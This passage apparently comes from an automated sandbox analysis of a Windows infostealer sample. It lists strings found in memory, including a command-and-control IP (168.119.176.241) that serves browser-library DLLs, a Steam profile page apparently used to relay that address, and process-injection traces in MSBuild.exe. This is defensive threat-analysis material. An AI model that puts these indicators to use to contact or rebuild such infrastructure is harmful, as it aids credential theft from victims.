a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agr
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181756308.00000000251AD000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356741702.000000002005D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://168.119.176.241
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001393000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001393000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/$
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/&
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/(%f
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001393000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/19.176.241/D
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/259H
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1875999041.0000000003307000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/41
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1842134770.0000000003307000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1843666426.0000000003306000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1837988087.0000000003304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/6
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/8
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/ECD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/H%
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1853924998.0000000003307000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/K
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/Microsoft
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1875999041.0000000003307000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864935902.0000000003307000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864808127.0000000003307000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1865053978.0000000003307000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864080722.0000000003305000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1865567141.0000000003307000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/RCHAR
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/X%
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/freebl3.dll
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/ge
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/graphy
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001393000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/key%
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/mozglue.dll5
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/mozglue.dllU
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/msvcp140.dll
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/nss3.dll
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/nss3.dllf
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/qo
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/r
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001393000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/r5
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/s
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/s_1l
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/softokn3.dll
Source: MSBuild.exe, 00000006.00000002.2343148482.000000000052A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/sqls.dll
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/sqls.dllI
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/sqls.dll_
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/t
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/vcruntime140.dll
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/vcruntime140.dlljk
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241/z:O
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241938.132
Source: MSBuild.exe, 00000006.00000002.2343148482.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.24194ad947dnt-Disposition:
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000005D7000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://168.119.176.241FB
Source: MSBuild.exe, 00000006.00000002.2343148482.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241HI
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000530000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241e
Source: MSBuild.exe, 00000006.00000002.2343148482.000000000054F000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.000000000056E000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000430000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://168.119.176.241ocal
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr	String found in binary or memory: 